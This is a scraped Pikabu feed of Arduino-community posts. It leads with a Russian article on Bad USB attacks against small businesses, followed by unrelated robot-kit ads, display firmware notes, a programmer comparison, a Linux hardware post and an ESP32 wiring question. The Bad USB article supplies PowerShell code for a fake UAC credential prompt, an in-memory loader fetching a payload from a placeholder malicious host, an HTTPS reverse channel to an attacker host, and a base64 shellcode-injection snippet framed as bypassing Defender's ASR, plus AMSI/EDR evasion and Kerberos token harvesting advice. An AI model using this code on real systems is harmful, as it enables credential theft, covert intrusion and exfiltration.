Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam

Топ прошлой недели

  • Oskanov Oskanov 8 постов
  • alekseyJHL alekseyJHL 6 постов
  • XpyMy XpyMy 1 пост
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Новости Пикабу Помощь Кодекс Пикабу Реклама О компании
Команда Пикабу Награды Контакты О проекте Зал славы
Промокоды Скидки Работа Курсы Блоги
Купоны Biggeek Купоны AliExpress Купоны М.Видео Купоны YandexTravel Купоны Lamoda
Мобильное приложение

Arduino это просто

995 постов сначала свежее
Seberd.ITBase
Seberd.ITBase
1 месяц назад

Атака через Bad USB на малый бизнес⁠⁠

Физический вектор атаки через эмуляцию USB HID остаётся жизнеспособным способом первичного проникновения в организации с недостаточной зрелостью процессов безопасности. Малый бизнес сохраняет уязвимость к подобным угрозам вследствие ограниченного контроля устройств, неполного охвата групповых политик и низкого уровня осведомлённости сотрудников.

Атака через Bad USB на малый бизнес Статья, Развитие, Информационная безопасность, Программа, Исследования, Гайд, Тренд, Тестирование, Arduino, IT, Telegram (ссылка), Длиннопост

https://t.me/scontrols

Хотите разбирать реальные случаи взломов и разбираться в киберугрозах? В своём Telegram-канале https://t.me/scontrols я делюсь историями атак, методами защиты и разбором уязвимостей. Подписывайтесь, если тема безопасности вам интересна.

Подготовка устройства Bad USB включает использование плат на базе микроконтроллеров с поддержкой HID (например, Arduino Pro Micro на ATmega32U4 или Digispark на ATtiny85). Для повышения реалистичности возможна модификация идентификаторов производителя и устройства (VID/PID) через прошивку EEPROM или изменение загрузчика с помощью внешнего программатора. Популярная практика включает эмуляцию моделей известных брендов периферии, чтобы избежать подозрений на этапе подключения.

На уровне прошивки реализуется сценарий автоматического ввода команд. Стандартный набор команд Arduino использует методы Keyboard.press(), Keyboard.print() и Keyboard.releaseAll(), что позволяет симулировать комбинации клавиш, необходимые для вызова окна «Выполнить» и запуска PowerShell в пользовательском контексте. В системах Windows 11 при стандартных настройках UAC выполнение команд от имени администратора без прямого подтверждения невозможно. Поэтому сценарий нацелен на выполнение команд от имени текущего пользователя, без явного повышения привилегий.

Сценарии с попыткой автоматизации нажатий Ctrl+Shift+Enter и Alt+Y для обхода UAC работают крайне нестабильно, поскольку Windows требует подтверждения через ввод учётных данных при наличии активной политики Secure Desktop.

Для повышения вероятности успешного повышения привилегий возможно применение социальной инженерии в виде поддельного окна UAC. Скрипт создаёт имитацию системного диалога, визуально идентичного стандартному UAC, с предложением ввести административные учётные данные. Пример кода на PowerShell для создания поддельного окна:

Add-Type -AssemblyName PresentationFramework $credential = [System.Windows.MessageBox]::Show('Windows needs your permission to continue.', 'User Account Control', 'OKCancel', 'Warning') if ($credential -eq 'OK') { Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "payload"' -Verb RunAs }

Для повышения реалистичности используется создание полноэкранной формы с блокировкой действий пользователя до ввода данных, после чего происходит передача введённой информации на внешний сервер или локальное её использование для немедленного повышения привилегий.

Первоначальный скрипт PowerShell должен быть минималистичным, способным к быстрой инъекции полезной нагрузки без необходимости записи файлов на диск. Для обхода AMSI и EDR предпочтительно использовать прямую загрузку полезной нагрузки в память процесса через Memory Injection.

Загрузка полезной нагрузки из сети реализуется через COM-объект WinHttp:

$webclient = New-Object -ComObject "WinHttp.WinHttpRequest.5.1" $webclient.Open("GET", "https://malicious.com/payload.bin", $false) $webclient.Send() $bytes = $webclient.ResponseBody $assembly = [System.Reflection.Assembly]::Load($bytes) $entryPoint = $assembly.EntryPoint $entryPoint.Invoke($null, @(,$null))

Этот подход позволяет загрузить исполняемый код напрямую в память, минуя файловую систему, что снижает вероятность обнаружения средствами антивирусной защиты и системами мониторинга активности на диске.

Для обратного подключения к системе управления атаками предпочтительно использовать реверсивное соединение через HTTPS-туннелирование. Прямые соединения по нестандартным портам часто блокируются NGFW и системами анализа сетевого трафика. Туннелирование через HTTPS позволяет замаскировать соединение под стандартный веб-трафик.

Создание HTTPS-туннеля может быть реализовано через встроенный в PowerShell модуль System.Net.HttpWebRequest:

$uri = "https://attacker.com/reverse" $request = [System.Net.HttpWebRequest]::Create($uri) $request.Method = "POST" $request.ContentType = "application/octet-stream" $stream = $request.GetRequestStream() while ($true) { $input = Read-Host $bytes = [System.Text.Encoding]::UTF8.GetBytes($input) $stream.Write($bytes, 0, $bytes.Length) $stream.Flush() }

В более продвинутых вариантах атаки создаётся сессионное соединение через WebSocket поверх HTTPS, что значительно усложняет обнаружение на уровне сетевых сигнатур.

Эксфильтрация данных через такие туннели маскируется под обычную активность HTTPS-сессий, что позволяет обойти системы DLP и NGFW, настроенные на анализ приложений по портам. В ряде случаев дополнительно применяется шифрование содержимого сессии на уровне прикладного протокола, чтобы усложнить инспекцию трафика.

Подключение устройства Bad USB пользователем остаётся непредсказуемым этапом атаки. Реальные исследования демонстрируют, что вероятность подключения найденного устройства в корпоративной среде варьируется от 10% до 20%. Этот показатель возрастает при наличии провоцирующих факторов вроде маркировки накопителя корпоративной символикой или намёка на ценную информацию.

Современные системы защиты, включая Microsoft Defender for Endpoint, CrowdStrike Falcon и SentinelOne, активно мониторят поведенческие индикаторы атаки: необычные цепочки процессов, аномальные сетевые активности, взаимодействия PowerShell с COM-объектами. Даже в случае успешного обхода AMSI вероятность обнаружения на этапе эксплуатации остаётся высокой при наличии правильно настроенных политик и оперативной облачной аналитики.

Техники Post-Exploitation в рамках Bad USB-атак в 2025 году опираются на быстрый переход к боковому перемещению и сбору ключевых артефактов, минимизируя шум в сети. Используются подходы инъекции шеллов в доверенные процессы через API NtCreateThreadEx, эксплуатации служебных интерфейсов COM для выполнения команд от имени системных служб, временного создания задач через Task Scheduler с последующим их удалением для достижения постоянства, захвата токенов привилегированных процессов через DuplicateTokenEx и имплантации в текущую сессию.

Обход защиты на этапе Post-Exploitation требует дополнительного внимания к механизмам Attack Surface Reduction (ASR), встроенным в Microsoft Defender for Endpoint 2025 года. Правила ASR активно блокируют запуск исполняемых файлов через Office-документы, автозагрузку через скрипты и несанкционированные изменения системных настроек. Для их обхода применяется модификация методов доставки полезной нагрузки. Скрипты внедряются через легитимные процессы, например, через taskhostw.exe или wsmprovhost.exe, с последующей загрузкой модулей в память через API VirtualAlloc и NtProtectVirtualMemory.

Пример скрипта обхода ASR с Memory Injection:

$bytes = [System.Convert]::FromBase64String("<payload_base64>") $ptr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($bytes.Length) [System.Runtime.InteropServices.Marshal]::Copy($bytes, 0, $ptr, $bytes.Length) $func = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, (New-Object System.Func[IntPtr, Int32])) $func.Invoke($ptr)

На следующем этапе может быть инициирован сбор Kerberos-токенов для последующего горизонтального перемещения по сети. Сбор осуществляется через вызовы методов LsaEnumerateLogonSessions и LsaGetLogonSessionData, позволяя получить действующие токены пользователей без необходимости их перехвата на сетевом уровне.

Обнаружение кейлоггеров и вредоносных агентов в малом бизнесе зависит от уровня зрелости инфраструктуры безопасности. Продвинутые резидентные кейлоггеры, внедрённые через Memory Injection и маскирующиеся под системные службы, могут оставаться незамеченными в течение нескольких суток при отсутствии EDR с поведенческим анализом.

Подведение итогов успешности всей цепочки атаки требует учёта множества факторов. Без строгих политик безопасности вероятность успешного проникновения и сбора информации оценивается на умеренном уровне. При наличии современных средств защиты вероятность успешной эксфильтрации и скрытого присутствия существенно снижается.

Показать полностью 1
Статья Развитие Информационная безопасность Программа Исследования Гайд Тренд Тестирование Arduino IT Telegram (ссылка) Длиннопост
1
8
A.Kristina
A.Kristina
1 месяц назад
Интересный AliExpress
Серия DIY Электроника

Собираем и программируем своего робота. Топ 15 интересных моделей⁠⁠

Образовательный набор для сборки гусеничного робота Mini Caterpillar STEM V3.0. Конструктор обучает конструированию, программированию и кодированию. В процессе сборки вы можете увидеть его многочисленные функции, такие как отслеживание света, отслеживание линии, дистанционное управление ИК и Bluetooth, регулировка скорости и направления движения и так далее. Кроме того, есть несколько мелких деталей, которые помогут вам собрать машину-робота. В состав набора включены базовые датчики и модули, такие как датчик пламени, датчик BT, датчик предотвращения препятствий, датчик отслеживания линии и ультразвуковой датчик. Два учебника по языку C и Arduino также помогут энтузиастам разного возраста.

Основные функции:

  • Несколько функций: ограничение, отслеживание линии, пожаротушение, слежение за светом, дистанционное управление ИК и BT, контроль скорости и т. д.

  • Простота сборки: просто соберите робота из нескольких частей.

  • Высокая прочность: кронштейны из алюминиевого сплава, металлические двигатели, высококачественные колеса.

  • Высокое расширение: подключите множество датчиков и модулей через экран драйвера двигателя и детали LEGO.

  • Несколько элементов управления: ИК-пульт дистанционного управления, управление приложениями (система iOS и Android)

  • Базовое программирование: код языка C для Arduino IDE.

Характеристики:

  • Рабочее напряжение: 5 В

  • Входное напряжение: от 6 до 9 В

  • Максимальный выходной ток: 1.5 А

  • Максимальная рассеиваемая мощность: 32 Вт

  • Скорость двигателя: 5 В 200 об/мин

  • Режим привода двигателя: двойной H-мост (HR8833)

  • Угол ультразвукового излучения: <15°

  • Ультразвуковое расстояние обнаружения: от 2 см до 300 см

  • Расстояние инфракрасного дистанционного управления: 10 метров

  • Расстояние дистанционного управления BT: 30 метров

Ссылка на робота


Интересный программируемый Arduino робот-мотоцикл самобалансирующийся. ссылка на него


Роботизированная рука Scara EBUY STEM для Arduino. Ссылка на неё


Роботизированный комплект HUAYUXIN ESP32 для сборки и программирования машинки с солнечной панелью. Ссылка на него

4-осевой шаговый робот с насосом и присосками. Ссылка на него


Самобалансирующийся робот для сборки Keyestudio Self-Balancing Robot Car Kit. Ссылка на него


Набор для сборки и программирования робота-машинки Keyestudio 4WD Mecanum Robot Car Kit. Ссылка на него


Собираем и программируем своего робота. Топ 15 интересных моделей Arduino, Программирование, Робототехника, Робот, Электроника, Своими руками, Самоделки, Изготовление, Роботизация, Увлекательно, Raspberry pi, Видео, Короткие видео, Вертикальное видео, Длиннопост, AliExpress, Реклама, Реклама на Пикабу

Набор для сборки мини танцующего робота. Ссылка на него


Набор для конструирования множества сценариев Keyestudio Smart Engineering Kit for Arduino. Ссылка на набор


Набор для сборки и программирования робота - художника. Ссылка на него


Собираем и программируем своего робота. Топ 15 интересных моделей Arduino, Программирование, Робототехника, Робот, Электроника, Своими руками, Самоделки, Изготовление, Роботизация, Увлекательно, Raspberry pi, Видео, Короткие видео, Вертикальное видео, Длиннопост, AliExpress, Реклама, Реклама на Пикабу

Набор для проектирования робо-фермы. Ссылка на него


Робот-писатель. Ссылка на набор


Стартовый комплект для сборки и программирования фонографа на Microbit V2. Ссылка на него


Набор для сборки красочной лампы Keyestudio на Microbit. Ссылка на неё


Двухколёсный робот Rider-Pi Two Wheel-legged Robot на Raspberry Pi CM4 . Ссылка на него

Показать полностью 2 12
Arduino Программирование Робототехника Робот Электроника Своими руками Самоделки Изготовление Роботизация Увлекательно Raspberry pi Видео Короткие видео Вертикальное видео Длиннопост AliExpress Реклама Реклама на Пикабу
2
11
MaksSim33
MaksSim33
1 месяц назад
Arduino & Pi

Поддержка UDP в новой Easy HMI 0.1.2⁠⁠

Работа по беспроводной сети планировалась при старте разработки Easy HMI и дисплеев AT HMI. В первых версиях также была заложена работа по беспроводной сети с использованием собственного протокола. Однако обучение новому протоколу оказалось гораздо сложнее, чем предоставление возможности работать с уже знакомым протоколом передачи данных. Поэтому было принято решение сделать реализацию общения по протоколу UDP.

Скачать Easy HMI 0.1.2.

Показать полностью
[моё] Программа Arduino Дисплей Лунная программа Видео ВК Видеоблог Udp Разработка Новинки Видео
0
17
lapot344229
lapot344229
1 месяц назад
Сообщество Ремонтёров

Еноты и скорость светы. Все программаторы вам врут⁠⁠

Вы чините ноутбуки?
Если чините, то ваш мир уже не будет прежним. Погнали.

Еноты и скорость светы. Все программаторы вам врут Spi, Flash, Eeprom, Windows, Linux, Android, Bios, Ремонт техники, Электроника, Материнская плата, Компьютерная помощь, Arduino, Текст, Ремонт ноутбуков, Пайка, Ремонт телефона, Сборка компьютера, Нужна помощь в ремонте, Поломка, Компьютерное железо, Длиннопост

Hi-End programmers - Программаторы относятся к высшему классу, и приводить сравнение с ними некорректно. Добавлены для только фона и только в эту таблицу.

Всем привет :)

Почти год прошёл от этого поста (а так-же этого , и месяц от статьи про выход из беты в релиз).
Там я рассказал многое, даже о появлении открытой версии, но забыл упомянуть самое главное - а именно цифры.

Без цифр что-либо оценить сложно. Поэтому сделал примерное сравнение параметров.

Но так как основная статья уже написана - повторять её здесь нет смысла, и я просто тут размещу первую таблицу, и дам вам ссылку на полную статью.

Сравнение скорости и подробное описание других параметров с самыми популярными программаторами вот чуть ниже в зелёной ссылке :).

А здесь на Хабре полное описание и продолжение таблиц.

Еноты и скорость светы. Все программаторы вам врут Spi, Flash, Eeprom, Windows, Linux, Android, Bios, Ремонт техники, Электроника, Материнская плата, Компьютерная помощь, Arduino, Текст, Ремонт ноутбуков, Пайка, Ремонт телефона, Сборка компьютера, Нужна помощь в ремонте, Поломка, Компьютерное железо, Длиннопост
Показать полностью 2
[моё] Spi Flash Eeprom Windows Linux Android Bios Ремонт техники Электроника Материнская плата Компьютерная помощь Arduino Текст Ремонт ноутбуков Пайка Ремонт телефона Сборка компьютера Нужна помощь в ремонте Поломка Компьютерное железо Длиннопост
44
14
ardublock
ardublock
1 месяц назад
ArduBlock

ArduBlock - Загружаем шрифт на дисплей DWIN⁠⁠

ArduBlock - Загружаем шрифт на дисплей DWIN Видео ВК, Arduino, YouTube, Вертикальное видео, Ardublock, Видео
Показать полностью 1
[моё] Видео ВК Arduino YouTube Вертикальное видео Ardublock Видео
0
19
MaksSim33
MaksSim33
1 месяц назад
Arduino & Pi

Универсальная прошивка для дисплеев ESP32-2432S028, ESP32-3248S035 и пр⁠⁠

На основе наработок по созданию HMI-дисплея из TFT-дисплея и ESP32 реализована поддержка дисплеев с различным разрешением и разными драйверами. Работа протестирована на дисплеях от 2,4 до 3,5 дюйма. Также реализовано автоматическое определение сенсора и его инициализация. Сейчас поддерживаются не только дисплеи с резистивным сенсором, но и дисплеи с емкостным сенсором с драйверами: GT911, CST816S. При необходимости можно добавить поддержку и других сенсоров.

Ниже приведен список поддерживаемых моделей дисплеев:

  • ESP32-2432S024С

  • ESP32-2432S024R

  • ESP32-2432S024

  • ESP32-2432S028С

  • ESP32-2432S028R

  • ESP32-2432S028

  • ESP32-2432S032

  • ESP32-2432S032R

  • ESP32-2432S032С

  • ESP32-3248S035С

  • ESP32-3248S035R

  • ESP32-3248S035

Исходные файлы тут>>>

Показать полностью
[моё] Arduino Программа Гайд Электроника Дисплей Видео ВК Программирование Прошивка Bin Видео
0
Avenir.Sirgun
Avenir.Sirgun
1 месяц назад
Серия Linux

Linux и минимальный комфорт⁠⁠

выяснено экспериментально.

Система 64 бит .
минимальный комфорт :
проц 4ядра по 3ггц, озу 2шт по 4гб двухканал.
1 диск под систему, 4 диска -хранилище.
сетевая карта минимум 1шт 100мбит с поддержкой linux.
видюха под текущий linux kernel .
тишина важный фактор: пк должно быть не слышно вообще с расстояния 1 метр при 100%% нагрузке.
мыш клава моник -- лишь бы работали.
флопик 3,5 желательно.
компактный размер.
без иллюминаций.
Для дома, небольшой сети до 4х компов в такой конфигурации: 3д, программирование, музыка, видео(если видяху помощнее поставить вместо офисной), планирование, сервер почты файлов сообщений ....

Linux и минимальный комфорт Linux, Программирование, IT, Компьютерная помощь, Компьютерное железо, Программа, Python, Сборка компьютера, C++, Julia, Maxima, 3D моделирование, Paint, Arduino, Длиннопост

мате

Linux и минимальный комфорт Linux, Программирование, IT, Компьютерная помощь, Компьютерное железо, Программа, Python, Сборка компьютера, C++, Julia, Maxima, 3D моделирование, Paint, Arduino, Длиннопост

иксвсё4

линукс с хфсе, иногда пользую mate и
конфигурация как я уже написал. оно не реактивное, но ничо не виснет, могу 20 вкладок браузера открыть, рендерить 3д. и +2 очееди копирования .

Linux и минимальный комфорт Linux, Программирование, IT, Компьютерная помощь, Компьютерное железо, Программа, Python, Сборка компьютера, C++, Julia, Maxima, 3D моделирование, Paint, Arduino, Длиннопост

консоль без де. менеджер файлов ncdu


частоту меньше и 2 ядра, 4гб пробовал лично
на ноутбуке Ноутбук HP Compaq cq57 -- просмотр онлайн видео 1080р тормозит. обрабатывать небольшие документы, рисунки годится. NAS будет тормозить когда захочешь несколько очередей синхронизации запустить.

если кому-то интересно могут заглянуть в мой профиль, чтобы пообщаться персонально.

Показать полностью 3
Linux Программирование IT Компьютерная помощь Компьютерное железо Программа Python Сборка компьютера C++ Julia Maxima 3D моделирование Paint Arduino Длиннопост
11
10
DezarEVM
DezarEVM
1 месяц назад
Arduino & Pi

Подключение TCD1205D к ESP32⁠⁠

всем привет. прощу помощи в подключении линейного считывателя изображения к esp32. проблема с распиновкой видимо.

моё подключение пинов
питание беру отдельно и даю 5 вольт
GROUND втыкаю в GND на плате
далее

SH (shift gate) - > GPIO 23

ICG (integration clear gate) -> GPIO 22

Φ1 (clock phase 1) -> GPIO 21

Φ2 (clock phase2) -> GPIO 19

OS (output signal) -> GPIO 18

пины брал с офф сайта https://www.alldatasheet.com/datasheet-pdf/view/32192/TOSHIB...

код ардуино такой

#define SH 23 // GPIO 23

#define ICG 22 // GPIO 22

#define PHI_M 21 // GPIO 21

#define PHI_M2 19 // GPIO 19

#define OS 18 // GPIO 18

void setup() {

Serial.begin(115200);

// Настройка выводов

pinMode(SH, OUTPUT);

pinMode(ICG, OUTPUT);

pinMode(PHI_M, OUTPUT);

pinMode(PHI_M2, OUTPUT);

pinMode(OS, INPUT); // входной сигнал

}

void loop() {

digitalWrite(ICG, HIGH); // Включаем ICG

delay(10);

digitalWrite(ICG, LOW); // Выключаем ICG

// Считывание данных

for (int i = 0; i < 128; i++) {

digitalWrite(SH, HIGH);

delayMicroseconds(10);

digitalWrite(SH, LOW);

// Чтение выходного сигнала

int pixelValue = digitalRead(OS);

Serial.println(pixelValue);

}

// Генерация тактового сигнала

for (int j = 0; j < 128; j++) {

digitalWrite(PHI_M, HIGH);

delayMicroseconds(10);

digitalWrite(PHI_M, LOW);

digitalWrite(PHI_M2, HIGH);

delayMicroseconds(10);

digitalWrite(PHI_M2, LOW);

}

delay(1000);

}

в результате я получаю 1 при включенном tcd и 0 при выключенном. чтобы я не делал и не ставил перед tcd значения не меняются.

может кто в теме. возможно проблема с интервалами. копа еще и перебираю. но если кто в теме подсобите пожалуйста :)

заранее спасибо.

Показать полностью
[моё] Разработка Программирование Esp32 Arduino Текст
9
Посты не найдены
О Нас
О Пикабу
Контакты
Реклама
Сообщить об ошибке
Сообщить о нарушении законодательства
Отзывы и предложения
Новости Пикабу
RSS
Информация
Помощь
Кодекс Пикабу
Награды
Команда Пикабу
Бан-лист
Конфиденциальность
Правила соцсети
О рекомендациях
Наши проекты
Блоги
Работа
Промокоды
Игры
Скидки
Курсы
Зал славы
Mobile
Мобильное приложение
Партнёры
Промокоды Biggeek
Промокоды Маркет Деливери
Промокоды Яндекс Путешествия
Промокоды М.Видео
Промокоды в Ленте Онлайн
Промокоды Тефаль
Промокоды Сбермаркет
Промокоды Спортмастер
Постила
Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии